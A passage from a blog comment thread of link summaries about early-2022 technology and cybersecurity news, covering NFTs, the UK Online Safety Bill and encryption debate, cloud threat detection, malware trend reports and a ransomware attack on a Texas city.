There are answers. Twitter calls NFTs “unique digital items, such as artwork, with proof of ownership that’s stored on a blockchain.” In marketing for the new feature, the company offered an even briefer take: “digital items that you own.” That promise, mated to a flood of interest and wealth in the cryptocurrency markets used to exchange them, has created an NFT gold rush over the past year. Last March, the artist known as Beeple sold an NFT at auction for $69.5 million. The digital sculptor Refik Anadol, one of the artists The Alantic commissioned to imagine a COVID-19 memorial in 2020, has brought in millions selling editions of his studio’s work in NFT form. Jonathan Mann, who started writing a song every day when he couldn’t find a job after the 2008 financial collapse, began selling those songs as NFTs, converting a fun internet hobby into a viable living.
Tomi Engdahl says:
Ryan Browne / CNBC:
The UK updates its Online Safety Bill proposal to outlaw content featuring revenge porn, drug and weapons dealing, suicide promotion, people smuggling, and more
Britain takes aim at online fraud, revenge porn with beefed-up rules for Big Tech
https://www.cnbc.com/2022/02/04/britain-beefs-up-online-safety-bill-with-new-criminal-offences.html
Britain’s landmark Online Safety Bill seeks to combat the spread of harmful and illegal content on social media sites including Facebook, YouTube and TikTok.
Lawmakers have called on the government to add more offences to the scope of the law, such as self harm, racial abuse and scam advertising.
The bill will now include provisions outlawing content that features revenge porn, drug and weapons dealing, suicide promotion and people smuggling.
Tomi Engdahl says:
Google Cloud Gets Virtual Machine Threat Detection
https://www.securityweek.com/google-cloud-gets-virtual-machine-threat-detection
Google on Monday announced the public preview of a new tool to help identify threats within virtual machines (VMs) running on its Google Cloud infrastructure.
The new Virtual Machine Threat Detection (VMTD), now available in the Security Command Center (SCC), provides agentless memory scanning to help identify cryptocurrency-mining malware and other threats in VMs.
With more and more organizations adopting cloud technologies, the number of threats targeting the cloud has increased significantly, and VMTD represents one of the actions Google is taking to help customers secure their assets, the company said in a note announcing the capability.
With the majority of compromised cloud instances abused for cryptocurrency mining, VMTD was designed to help protect against this type of attack, as well as against data exfiltration and ransomware, Google says.
“Because VM Threat Detection operates from outside the guest VM instance, the service does not require guest agents or special configuration of the guest OS, and it is resistant to countermeasures used by sophisticated malware,” Google added.
The main idea behind VMTD is to help customers identify potentially malicious behavior inside their VMs without requiring them to run additional software, thus ensuring that performance is not altered in any way and that the attack surface remains low.
Tomi Engdahl says:
Gaining and Retaining Security Staff in The Age of the Great Resignation
https://www.securityweek.com/gaining-and-retaining-security-staff-age-great-resignation
Cybersecurity employers need to adapt their recruitment and retention practices to gain from benefits and minimize detriments
We live in interesting times for cyber talent recruitment and retention. The task is never easy, but is now affected by two conflicting pressures: the ‘Great Resignation’ leading to staff departures, and the growth of remote working potentially increasing the pool of available applicants as replacements.
The latter is both an advantage for gaining new talent, and a contributor to the Great Resignation. Both effects are arguably influenced by the Covid-19 pandemic. SecurityWeek talked to Jon Check, executive director of cyber protection solutions at Raytheon Intelligence & Space to gain practical insight into today’s staffing problems and solutions. Raytheon I&S provides services and support to customers largely in the government and the defense industries.
Tomi Engdahl says:
Uusi tekniikka salaa avaimen täysin
https://etn.fi/index.php/13-news/13145-uusi-tekniikka-salaa-avaimen-taeysin
Järjestelmäpiireillä voidaan jo nyt generoida piirin salausavain valmistuksessa syntyvien fyysisten ominaisuuksien perusteella. Tyypillisesti tämä uniikki avain tallennetaan piirille sulakkeeseen, mikä ei riitä sataprosenttiseen salaukseen. PUFsecurityn kehittämä tekniikka ratkaisee ongelman.
Salauksessa puhutaan nyt luottamuksen juuresta (Root of Trust) eli laitetason salaukseen. PUF (Physical Unclonable Function) tarkoittaa piirin valmistuksessa syntyviä uniikkeja eroja, joiden avulla sirulla voidaan luoda uniikki avain. PUFsecurity ja eMemory ovat nyt kehittäneet salausratkaisun, jossa nämä molemmat toiminnot yhdistetään.
Käytännössä PUFrt-ratkaisussa on kyse kvanttitunnelointiin perustuvan PUF:n ja eMemoryn antisulakepohjaisen kertaohjemoitavan muistin yhdistelmästä. PUFsecurity muistuttaa, että salaus on vain niin pitävä kuin sen heikoin lenkki. Uniikki avain ei riitä, jos sitä ei ole tallennettu tavalla, jota ei voi murtaa.
Sulake- eli eFuse-ratkaisussa PUF-toiminnon tuottama avain ohjelmoidaan OTP-muistiin metallilla tai polykalvolla, mikä jättää näkyvän jäljen. Tämän avaimen ohjelmointi antisulakemuistiin tapahtuu polttamalla piirin oksidia. Tämä jättää piirille johtavan polun ilman ulkoisesti näkyvää vihjettä.
Antisulakemuistin solut näyttävät ulospäin samanlaisilta riippumatta siitä, millainen avain niihin on tallennettu. PUFsecurity on jo esitellyt ratkaisua yhdessä Arm:n CC312-solun (Crypto Cell-312) kanssa, joka on suosituin tapa toteuttaa salausavaimen tallennus järjestelmäpiireillä.
PUFrt: Solving Chip Security’s Weakest Link
https://blog.pufsecurity.com/2021/12/20/pufrt-solving-chip-securitys-weakest-link/
Tomi Engdahl says:
EXPERTS CHALLENGE GOVT’S ANTI-ENCRYPTION CAMPAIGN
https://www.openrightsgroup.org/publications/experts-challenge-govts-anti-encryption-campaign/
Leading cybersecurity experts and human rights activists say scaremongering tactics being used to mislead the public and make bogus case for weakening encryption. Over half a million pounds of taxpayers’ money spent on advertising campaign
Tomi Engdahl says:
Typical startup cybersecurity mistakes
https://www.kaspersky.com/blog/startup-cybersecurity-mistakes/43559/
You can find about a million tips on how to keep a startup afloat on the Internet. Usually advisers draw attention to the issues of business planning, marketing strategy, attracting additional investment and so on, but articles rarely talk about the problem of building a solid cybersecurity system. However, the lack of a clear understanding of threats can cost a startup a potentially successful business. We decided to talk about most typical cybersecurity mistakes and, more importantly, how to prevent them.
Tomi Engdahl says:
January 2022s Most Wanted Malware: Lokibot Returns to the Index and Emotet Regains Top Spot https://blog.checkpoint.com/2022/02/08/january-2022s-most-wanted-malware-lokibot-returns-to-the-index-and-emotet-regains-top-spot/
Our latest Global Threat Index for January 2022 reveals that Emotet has now pushed Trickbot out of first place after a long stay at the top, and is this months most prevalent malware, affecting 6% of organizations worldwide.. Log4j is also still proving to be a problem, impacting 47.4% of organizations globally and the most attacked industry continues to be Education/Research. After only two and a half months since its return, Emotet has surged into the top spot. The notorious botnet is most commonly spread via phishing emails that contain malicious attachments or links. Its increased use has only been helped by the prevalence of Trickbot that acts as a catalyst, spreading the malware even further.
Tomi Engdahl says:
PrivateLoader: The first step in many malware schemes https://intel471.com/blog/privateloader-malware
Pay-per-install (PPI) malware services have been an integral part of the cybercrime ecosystem for a considerable amount of time. A malware operator provides payment, malicious payloads and targeting information, and those responsible for running the service outsource the distribution and delivery. The accessibility and moderate costs allow malware operators to leverage these services as another weapon for rapid, bulk and geo-targeted malware infections. By understanding how these services proliferate, defenders can better recognize these campaigns and stop them from wreaking havoc on their organizations IT stack.
Tomi Engdahl says:
UK anti-encryption drive meets fierce resistance from privacy, security advocates https://portswigger.net/daily-swig/uk-anti-encryption-drive-meets-fierce-resistance-from-privacy-security-advocates
The UK governments anti-encryption campaign amounts to scaremongering, according to 50 security experts and human rights groups. In an open letter, they claim that the campaign by advertising agency M&C Saatchi rumoured to have cost the taxpayer £500,000 ($677,000) is being used to soften up public opinion on changes to the Online Safety Bill that would force tech companies to weaken or remove end-to-end encryption
(E2EE) in messaging apps.
Tomi Engdahl says:
Cyber teams from across the globe to compete in 1st International Cybersecurity Challenge https://www.enisa.europa.eu/news/enisa-news/cyber-teams-from-across-the-globe-to-compete-in-1st-international-cybersecurity-challenge
In partnership with regional and international organisations, the European Union Agency for Cybersecurity (ENISA) will host the first International Cybersecurity Challenge, a Cyber World Cup. Building on the success of the so-called Capture-the-flag competitions (CTFs) ENISA, together with other regional and international organisations, decided to design and host for the first time the International Cybersecurity Challenge (ICC). With this first ever Cyber World Cup, which comprise a number of different cybersecurity challenges, we are entering a new dimension by moving up to a global scale with regional teams joining from all over the world.
Tomi Engdahl says:
How a Texas hack changed the ransomware business forever https://therecord.media/how-a-texas-hack-changed-the-ransomware-business-forever/
The early morning hours of August 16, 2019 began with the whirring and burping sound of computer printers. The scratch and screech echoed along the empty corridors of the Borger, Tex. administrative offices, paper sliding from tray to ink jet to tray and then back again. Anyone in the office that steamy Friday who happened to glance at the finished pages would have seen sheets covered in gibberish: all ampersands, exclamation points and broken English.. To Jason Whisler, the citys emergency management coordinator, it was clear what this
meant: Borger, population 13,000, was suffering from a ransomware attack and those pages on the printers were filled with demands.
Tomi Engdahl says:
The UKs National Cyber Strategy 2022 An Evolution https://www.paloaltonetworks.com/blog/2022/01/the-uks-national-cyber-strategy-2022/
The UK Government has once again shifted the cyber discourse with the recent publication of the National Cyber Strategy 2022, marking a significant change in how the government views cybersecurity and solidifying its position as a global cyber power. In fact, the use of the term cyber power is used throughout the strategy and ultimately illustrates the change in how the government views cyberspace, centering on the ability of a state to protect and promote its interests in and through cyberspace.. The focus is no longer solely about security, but more on how to harness cyber power for economic and social advantage, elevating the cyber domain from purely a security issue to a whole of society concern.